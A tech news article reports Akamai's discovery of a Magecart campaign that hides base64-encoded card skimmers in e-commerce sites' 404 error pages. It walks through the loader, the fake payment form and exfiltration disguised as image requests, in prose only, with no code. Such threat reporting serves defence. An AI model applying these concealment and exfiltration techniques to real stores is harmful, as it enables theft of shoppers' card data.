Magecart, a notorious group of cyber criminals known for their proficiency in stealing sensitive data from e-commerce websites, has unveiled a devious scheme that capitalizes on a seemingly harmless element of the internet – the 404 error page. This innovative tactic, discovered by the Akamai Security Intelligence Group, is one of three variants employed by Magecart, and it involves hiding malicious code within the digital abyss of 404 error pages to pilfer customers’ credit card information surreptitiously.
How did 404 pages become a cybercriminal’s playground?
In this cyberattack orchestrated by the Magecart group, hackers manipulate a website’s 404 error page—the page displayed when a webpage doesn’t exist or has a broken link. They hide malicious code within this seemingly innocuous page to steal credit card information from unsuspecting visitors. The concealed code presents a fake form to users, prompting them to enter sensitive credit card details. This stolen data is then covertly transmitted to the hackers, disguised as innocent image requests. The innovative approach makes detection challenging, emphasizing the need for robust cybersecurity measures to protect online transactions and user information.
Let’s delve into the details of how this Magecart card-skimming hack, which exploits 404 error pages, actually works:
- Target selection: The first step for Magecart hackers is to identify their targets, which primarily include e-commerce websites built on popular platforms like Magento and WooCommerce. Some victims of this campaign have been prominent organizations in the food and retail sectors.
- Concealment of malicious code: Once a target is chosen, the hackers employ an innovative technique. They manipulate the website’s 404 error page, which is the page visitors see when they try to access a webpage that doesn’t exist, has been moved, or contains a dead link.
- Hiding in plain sight: Instead of inserting their malicious code directly into the website’s code, the Magecart actors hide it within the 404 error page. This tactic is particularly clever because it hasn’t been seen in previous Magecart campaigns. By doing this, they have a new way to evade detection.
- The skimmer loader: The skimmer loader is a critical component of the attack. It can take on various disguises, such as appearing as a Meta Pixel code snippet or hiding within pre-existing inline scripts on the compromised checkout webpage.
- Fetching non-existent resources: The loader initiates a fetch request to a relative path named ‘icons.’ This path does not exist on the targeted website, resulting in a “404 Not Found” error. At first glance, it may seem like an innocent mistake or an inactive skimmer.
- Cloaked in HTML comments: However, upon closer inspection, the loader contains a regular expression match that searches for a specific string within the HTML of the 404 error page. When it finds this string, it reveals a concatenated base64-encoded string cleverly concealed within an HTML comment.
- Malicious JavaScript unveiled: This base64-encoded string, when decoded, reveals the JavaScript skimmer, which is designed to remain hidden on all 404 error pages.
- Concealed data exfiltration: With the skimmer active, it presents a fake form to website visitors. This deceptive form prompts users to input sensitive information, including their credit card number, expiration date, and security code. Unbeknownst to the victim, the moment they enter this data, they receive a fake “session timeout” error.
- Data exfiltration: In the background, all the stolen information is base64-encoded and sent to the attacker via an image request URL, carrying the string as a query parameter. This deceptive approach masks the data exfiltration as a seemingly harmless image fetch event, making it challenging for network traffic monitoring tools to identify.
- Stolen information: However, upon decoding the base64 string, the attacker gains access to personal and credit card information, potentially leading to identity theft and financial loss for the victims.
This sophisticated attack highlights the evolving tactics of Magecart hackers, who continuously find new ways to conceal their malicious code and compromise the security of online stores. It underscores the need for heightened vigilance in safeguarding sensitive information and the imperative for robust cybersecurity measures to protect both businesses and consumers in an increasingly digital world.
For more detailed information about it, read the official report.
Featured image credit: Erik Mclean/Unsplash